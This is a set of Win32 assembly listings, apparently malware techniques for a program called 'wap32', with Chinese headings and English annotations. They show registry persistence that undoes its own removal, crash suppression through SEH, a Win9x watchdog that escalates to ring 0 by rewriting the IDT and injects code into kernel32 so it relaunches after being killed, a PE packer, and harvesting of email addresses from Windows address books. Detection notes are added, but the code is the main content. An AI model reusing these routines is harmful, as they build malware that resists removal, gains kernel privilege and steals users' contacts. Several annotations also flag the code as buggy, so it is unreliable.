extrn CreateThread: proc <br>
extrn Sleep: proc <br>
extrn RegQueryValueExA: proc <br>
<br>
start: <br>
; Entry point. Opens a key under HKLM named by HKeyStr, writes PathName <br>
; into value ValueName, then starts a watcher thread that rewrites the <br>
; value whenever it changes (self-healing persistence). For detection: <br>
; a RegSetValueExA on the same value right after each external change <br>
; is the observable; auditing this key catches it. RegOpenKeyA and <br>
; RegSetValueExA are not in the visible extrn lines - presumably they <br>
; come from the include above this listing. <br>
; Registers: ebx = open key handle, live across every call below. <br>
; No return status is checked anywhere in this routine. <br>
push eax ;one stack slot, passed via esp as the phkResult out-param <br>
call RegOpenKeyA,080000002h,offset HKeyStr,esp ;080000002h = HKEY_LOCAL_MACHINE <br>
pop ebx ;ebx = opened key handle <br>
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h ;type 01 = REG_SZ; always writes 100h bytes from PathName whatever its real length <br>
<br>
sub esp,100h ;100h-byte scratch buffer on the stack <br>
mov eax,esp ;eax = buffer address (lpData) <br>
push 100h ;size in/out slot, passed via esp (lpcbData) <br>
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp ;read the value back into the buffer <br>
pop eax ;eax = size returned by the query <br>
add esp,100h ;discard the buffer; the read-back data is never examined <br>
<br>
push eax ;slot for the thread-id out-param <br>
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp ;watcher thread; its parameter is the key handle <br>
pop eax <br>
call Sleep,1000*60*3 ;keep the process alive for three minutes <br>
ret ;returning from the entry point presumably ends the process, so the watcher lives only for the sleep above - confirm <br>
<br>
RegProtectProc proc hKey:dword <br>
; Thread body: snapshots the value named by the inline string below <br>
; ('wap32') under hKey and rewrites it every time the key's last-set <br>
; time changes, so a removal is undone at once. Never returns. <br>
; Set-value events that follow every delete within milliseconds are <br>
; what registry monitoring should alert on. <br>
; Registers: ebx = hKey, edi = 100h-byte stack buffer with the data, <br>
; esi = address of the inline value-name string. <br>
mov ebx,hKey <br>
sub esp,100h ;scratch buffer for the value data <br>
mov edi,esp <br>
call GetProtectKeyName ;pushes the address of the string below as its "return address" <br>
db 'wap32',0 ;value name, embedded in the instruction stream <br>
GetProtectKeyName: <br>
pop esi ;esi = address of 'wap32' (position-independent string reference) <br>
push 100h ;size in/out slot <br>
call RegQueryValueExA,ebx,esi,0,0,edi,esp ;snapshot the value that will be restored <br>
pop eax <br>
WaitRegChangeNotify: <br>
call RegNotifyChangeKeyValue,ebx,0,4,0,0 ;block until the key changes (4 = REG_NOTIFY_CHANGE_LAST_SET; no event, so synchronous) <br>
call RegSetValueExA,ebx,esi,0,01,edi,100h ;put the snapshot back (01 = REG_SZ, always 100h bytes) <br>
jmp short WaitRegChangeNotify ;loop forever <br>
RegProtectProc endp <br>
<br>
end start <br>
<br>
<br>
<br>
3、 Windows 9x/2000 意外处理通用程序 <br>
<br>
<br>
此段程序可以达到屏蔽程序错误的效果 <br>
<br>
include wap32.inc <br>
<br>
.386p <br>
.model flat,stdcall <br>
<br>
extrn MessageBoxA: proc <br>
extrn ExitProcess: proc <br>
<br>
.data <br>
<br>
Msg db 'Fuck',0 <br>
<br>
SetSehFrame: ;ecx = address to resume at when the fault is ignored <br>
; Installs a minimal SEH frame whose handler is the 'jmp short Exception' <br>
; below and stashes esp in the slot owned by GetEspAddr. Called from <br>
; PushErrorProc with ecx = resume address; returns to its caller via eax. <br>
; Note: this routine, the handler thunk and the esp slot all sit between <br>
; '.data' and '.code', i.e. they are assembled into the writable data <br>
; section. Executing from .data and registering a handler outside the <br>
; image's code is exactly what DEP/NX and SafeSEH reject, so the trick <br>
; is confined to the old Win9x/2000 targets named in the heading. <br>
pop eax ;eax = return address <br>
push ecx ;save the resume address on the stack <br>
call PushExceptionProc ;pushes the address of the jmp below = handler field of the SEH record <br>
jmp short Exception ;handler thunk: the OS dispatcher calls here <br>
PushExceptionProc: <br>
push fs:dword ptr[0] ;prev field of the SEH record <br>
mov fs:[0],esp ;link the new record at the head of the chain <br>
call GetEspAddr ;edx = address of the esp save slot <br>
push D [edx] ;save the slot's old contents <br>
mov [edx],esp ;remember esp so ClearSehFrame can unwind to here <br>
jmp eax ;return to caller <br>
ClearSehFrame: <br>
pop eax ;eax = return address <br>
call GetEspAddr <br>
mov esp,[edx] ;unwind the stack to where SetSehFrame left it <br>
pop D [edx] ;restore the slot's old contents <br>
pop fs:dword ptr[0] ;unlink the SEH record <br>
pop ecx ;discard the handler address <br>
pop ecx ;ecx = resume address <br>
jmp eax ;return to caller <br>
<br>
Exception proc pRecord,pFrame,pContext,pDispatch <br>
; SEH handler. Points the faulting thread's saved Eip at the <br>
; 'call ClearSehFrame' below and reports ExceptionContinueExecution <br>
; (eax = 0), so the faulting instruction is skipped silently and the <br>
; thread goes on at the resume address carried in ecx. Swallowing <br>
; access violations this way hides real bugs: it is crash suppression, <br>
; not error handling. <br>
call PushSehBackProc ;pushes the address of the next line as the patched resume point <br>
call ClearSehFrame ;runs later, once the OS restores the patched context <br>
jmp ecx ;ecx comes back from the saved context; presumably still the resume address set by PushErrorProc <br>
PushSehBackProc: <br>
pop ecx ;ecx = address of 'call ClearSehFrame' <br>
mov eax,pContext <br>
mov [eax.cx_Eip],ecx ;patch the saved instruction pointer <br>
xor eax,eax ;0 = ExceptionContinueExecution: resume at the patched Eip <br>
ret ;NOTE(review): this ret must land in the OS dispatcher, which assumes no frame prologue was emitted for this proc - confirm against wap32.inc <br>
Exception endp <br>
<br>
GetEspAddr: <br>
; Returns edx = address of the 'dd ?' slot below, which SetSehFrame uses <br>
; to stash esp. The slot lives in the instruction stream (here in the <br>
; .data section), so it is located position-independently via call/pop. <br>
call PushOffsetEspAddr ;pushes the slot's address as the "return address" <br>
dd ? ;esp save slot <br>
PushOffsetEspAddr: <br>
pop edx ;edx = address of the slot <br>
ret <br>
<br>
<br>
.code <br>
<br>
Start: <br>
; Demo entry: provokes an access violation inside a SEH frame and <br>
; continues at the MessageBoxA call as if nothing had happened. <br>
call PushErrorProc ;pushes the address of the MessageBoxA line as the resume point <br>
call MessageBoxA,0,offset Msg,offset Msg,0 ;reached through the handler after the fault <br>
ret <br>
PushErrorProc: <br>
pop ecx ;ecx = resume address (the MessageBoxA line) <br>
call SetSehFrame ;install the frame; ecx = resume address <br>
mov ds:[0],eax ;deliberate write to address 0: raises the access violation <br>
call ClearSehFrame ;only reached if no fault occurred <br>
ret <br>
<br>
<br>
end Start <br>
<br>
<br>
<br>
4、Windows 9x 下进程不死术<br>
<br>
此段程序首先实现Win9x下注射远程线程(新技术) <br>
然后与Win2k下进程不死术一样了。 <br>
include Win32.inc <br>
<br>
.386p <br>
.model flat,stdcall <br>
<br>
extrn GetProcAddress: proc <br>
extrn WinExec: proc <br>
extrn MessageBoxA: proc <br>
extrn Sleep: proc <br>
extrn GetCurrentProcessId: proc <br>
extrn OpenProcess: proc <br>
extrn GetCurrentProcess: proc <br>
extrn WriteProcessMemory: proc <br>
extrn GetExitCodeProcess: proc <br>
<br>
.data <br>
<br>
;问题,要Sleep()这样做使Kernel32有机会更新数据 <br>
KnlThread proc ProcID:dword <br>
; Thread body meant to run from a copy at another address, so every <br>
; reference is made position-independent via call/pop. It waits for <br>
; process ProcID to end and then relaunches FileName with WinExec. <br>
; The three 'dd ?' slots are filled by Start with resolved kernel32 <br>
; entry points before the copy is made. Behaviourally this is a <br>
; watchdog that restarts the program as soon as it is killed; that <br>
; restart-after-kill pattern is the observable to alert on. <br>
; Registers: ebx = process handle, ecx = address of FileName. <br>
call GetKnlOpenProcess ;pushes the address of the slot below <br>
KnlOpenProcess dd ? ;patched by Start: address of OpenProcess <br>
GetKnlOpenProcess: <br>
pop eax ;eax = address of the slot <br>
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID ;OpenProcess(ProcID) <br>
or eax,eax <br>
jz short ExitProtectProc ;could not open the process: give up <br>
mov ebx,eax ;ebx = process handle <br>
call GetKnlWaitForSingleObject <br>
KnlWaitForSingleObject dd ? ;patched by Start: address of WaitForSingleObject <br>
GetKnlWaitForSingleObject: <br>
pop eax <br>
call [eax],ebx,-1h ;wait with no timeout (-1 = INFINITE) for the process to end <br>
call GetFileNameAddress <br>
GetFileNameAddress: <br>
pop ecx ;ecx = address of this label in the running copy <br>
add ecx,offset FileName-offset GetFileNameAddress ;ecx = address of FileName in the running copy <br>
call GetKnlWinExec <br>
KnlWinExec dd ? ;patched by Start: address of WinExec <br>
GetKnlWinExec: <br>
pop eax <br>
call [eax],ecx,01 ;WinExec(FileName, 01 = SW_SHOWNORMAL) <br>
ExitProtectProc: <br>
ret <br>
KnlThread endp <br>
<br>
FileName db 'c:\wap32.exe',0 <br>
<br>
KnlOpenProcessStr db 'OpenProcess',0 <br>
KnlWaitForObjectStr db 'WaitForSingleObject',0 <br>
KnlWinExecStr db 'WinExec',0 <br>
KnlSleepStr db 'Sleep',0 <br>
KnlCreateKnlThreadStr db 'CreateKernelThread',0 <br>
<br>
.code <br>
<br>
Start: <br>
; Resolves three kernel32 exports through a hard-coded module base <br>
; (0bff70000h - presumably kernel32's fixed load address on Win9x), <br>
; stores them in the slots inside KnlThread, copies 100h bytes into the <br>
; region at 0bff70600h and starts a kernel thread there with the <br>
; current process id as parameter. The hard-coded base and the write <br>
; into a system DLL's pages are Win9x-only assumptions; they do not <br>
; carry over to NT-family Windows, where the copy faults. <br>
; NOTE(review): the source passed to MoveDataToKnl is 'offset Start' <br>
; (this .code entry), not KnlThread, which holds the patched slots and <br>
; FileName - looks like the wrong symbol; confirm intent. <br>
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr <br>
mov KnlOpenProcess,eax ;patch the slot inside KnlThread <br>
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr <br>
mov KnlWaitForSingleObject,eax <br>
call GetProcAddress,0bff70000h,offset KnlWinExecStr <br>
mov KnlWinExec,eax <br>
<br>
call MoveDataToKnl,offset Start,0bff70600h,100h ;copy 100h bytes into the kernel32 region <br>
<br>
call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr <br>
mov ebx,eax ;ebx = resolved CreateKernelThread <br>
call GetCurrentProcessId <br>
push eax ;slot for the thread-id out-param <br>
call ebx,0,0,0bff70000h+600h,eax,0,esp ;thread start = the copied code; parameter = our process id <br>
pop eax <br>
call MessageBoxA,0,offset FileName,offset FileName,0 ;keeps the process alive until dismissed <br>
ret <br>
<br>
MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword <br>
; Copies nCx bytes from Src to Des while executing at ring 0: the int 3 <br>
; gate in the IDT is temporarily pointed at the 'pushad' below, 'int 3' <br>
; is raised, the copy runs inside that handler, and the original gate <br>
; is restored before 'iret'. This depends on the IDT being writable <br>
; from user mode, which Win9x allows; NT-family Windows protects the <br>
; IDT, so the first gate write faults there. A user-mode 'sidt' <br>
; followed by IDT writes is a well-known Win9x privilege-escalation <br>
; pattern and a strong detection indicator on its own. <br>
; Registers: eax = address of the int 3 gate, ebx:edx = saved gate. <br>
push eax <br>
sidt [esp-2] ;6-byte IDTR store: limit at [esp-2], 32-bit base at [esp] <br>
pop eax ;eax = IDT base <br>
add eax,3*8 ;eax = descriptor for vector 3 (8 bytes per gate) <br>
mov ebx,[eax] ;save both dwords of the original gate <br>
mov edx,[eax+4] <br>
call SetIdt03 ;pushes the address of the pushad below; SetIdt03 writes it into the gate <br>
pushad ;--- ring 0 from here, entered via int 3 --- <br>
mov [eax],ebx ;restore the original gate first <br>
mov [eax+4],edx <br>
cld <br>
rep movsb ;the privileged copy: esi -> edi, ecx bytes <br>
popad <br>
iret ;back to the instruction after int 3 <br>
SetIdt03: <br>
cli <br>
pop W[eax] ;low word of the pushad address -> gate offset bits 0-15 <br>
pop W[eax+6] ;high word -> gate offset bits 16-31 <br>
mov esi,Src <br>
mov edi,Des <br>
mov ecx,nCx <br>
int 3; enter the handler installed above <br>
sti <br>
ret <br>
MoveDataToKnl endp <br>
<br>
end Start <br>
<br>
<br>
5、简单算法,高效率压缩PE文件<br>
<br>
.586p <br>
.model flat,STDCALL <br>
.data <br>
<br>
OldFile db 'pe.exe',0 <br>
NewFile db 'pe.zzz',0 <br>
<br>
FileData db 0,0 <br>
.code <br>
extrn _lopen: proc,_lcreat: proc <br>
extrn _lread: proc,_lwrite: proc <br>
extrn _lclose: proc <br>
extrn ExitProcess: proc <br>
start: <br>
; Entry: run-length encodes zero bytes from OldFile into NewFile. <br>
; Encoding: a non-zero byte is copied as is; a run of n zero bytes <br>
; (1..0ffh) is written as the pair 00,n; longer runs become several <br>
; pairs. Every byte goes through its own _lread/_lwrite call, so this <br>
; is slow on large input. No _lwrite return value is checked. <br>
; Registers: esi = input handle, edi = output handle, ebx = pending <br>
; zero-run length, FileData = 2-byte I/O buffer. <br>
call _lopen,offset OldFile,0 ;open input (mode 0 = read) <br>
cmp eax,-1 <br>
jz ExitProc ;open failed (-1 = HFILE_ERROR) <br>
mov esi,eax <br>
call _lcreat,offset NewFile,0 <br>
cmp eax,-1 <br>
jz CloseOldFile ;create failed: close the input and exit <br>
mov edi,eax <br>
<br>
xor ebx,ebx ;no zeros pending <br>
ReadData: <br>
call _lread,esi,offset FileData,1 ;one byte at a time <br>
or eax,eax <br>
jz short ReadOver ;0 bytes = end of file; a -1 error return is not distinguished and is treated as data <br>
movzx eax,FileData <br>
or eax,eax <br>
jnz short NoZero <br>
inc ebx ;another zero in the run <br>
cmp ebx,0ffh <br>
jnz short ReadData ;keep counting until the run is full <br>
xor eax,eax <br>
mov ah,bl ;ax in memory order = 00,0ffh <br>
xchg ax,word ptr FileData <br>
call _lwrite,edi,offset FileData,2 ;flush a full run <br>
xor ebx,ebx <br>
jmp short ReadData <br>
NoZero: <br>
or ebx,ebx <br>
jnz short NoZeroData ;a zero run precedes this byte: flush it first <br>
call _lwrite,edi,offset FileData,1 ;plain byte, copied through <br>
jmp short ReadData <br>
NoZeroData: <br>
push eax ;keep the non-zero byte <br>
xor eax,eax <br>
mov ah,bl ;ax in memory order = 00,count <br>
mov word ptr FileData,ax <br>
call _lwrite,edi,offset FileData,2 ;flush the pending run <br>
xor ebx,ebx <br>
pop eax <br>
mov FileData,al <br>
call _lwrite,edi,offset FileData,1 ;then the byte itself <br>
jmp ReadData <br>
ReadOver: <br>
or ebx,ebx <br>
jz short CloseFile ;nothing pending <br>
xor eax,eax <br>
mov ah,bl <br>
xchg ax,word ptr FileData <br>
call _lwrite,edi,offset FileData,2 ;flush the run pending at end of file <br>
xor ebx,ebx <br>
CloseFile: <br>
call _lclose,edi <br>
CloseOldFile: <br>
call _lclose,esi <br>
ExitProc: <br>
call ExitProcess,0 <br>
<br>
end start <br>
<br>
6、提取Windows地址薄文件(*.WAB)的Email信息<br>
<br>
.586p <br>
.model flat,STDCALL <br>
.data <br>
<br>
MailFile db 'My.WAB',0 <br>
<br>
.code <br>
<br>
extrn _lopen: proc,_lcreat: proc <br>
extrn _lread: proc,_lwrite: proc <br>
extrn _llseek: proc <br>
extrn _lclose: proc <br>
extrn MessageBoxA: proc <br>
extrn ExitProcess: proc <br>
extrn WideCharToMultiByte: proc <br>
<br>
start: <br>
; Entry: reads the first 100h bytes of MailFile, seeks to the offset <br>
; stored at header+60h and walks [header+64h] records of 44h bytes, <br>
; converting each from Unicode (UTF-16) and showing it in a message box. <br>
; This is the same read pattern mass-mailers use to harvest addresses; <br>
; *.WAB reads by anything other than the mail client are worth alerting on. <br>
; Registers: ebx = file handle, edi = 100h-byte stack buffer. <br>
call _lopen,offset MailFile,0 ;mode 0 = read <br>
cmp eax,-1 <br>
jz short ExitProc ;open failed <br>
mov ebx,eax <br>
sub esp,100h ;header / record buffer <br>
mov edi,esp <br>
call _lread,ebx,edi,100h <br>
cmp eax,100h <br>
jnz short CloseFile ;short read: not a usable file <br>
mov eax,[edi+60h] ;offset of the Unicode name table (per this listing's reading of the header) <br>
call _llseek,ebx,eax,0 <br>
mov ecx,[edi+64h] ;number of Unicode name entries; NOTE(review): taken from the file and used as the loop count unchecked <br>
ContWabMail: <br>
push ecx ;ecx is clobbered by the calls below <br>
call _lread,ebx,edi,44h ;read one record <br>
cmp eax,44 ;NOTE(review): compares with decimal 44 although 44h bytes were requested, and no jump uses the result - a short read goes undetected <br>
sub esp,100h ;output buffer for the converted string <br>
mov eax,esp <br>
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 ;-1 = NUL-terminated input; flags 200h <br>
mov eax,esp <br>
call MessageBoxA,0,eax,eax,0 ;display the record <br>
add esp,100h <br>
pop ecx <br>
loop short ContWabMail <br>
CloseFile: <br>
call _lclose,ebx <br>
ExitProc: <br>
call ExitProcess,0 <br>
<br>
end start <br>
<br>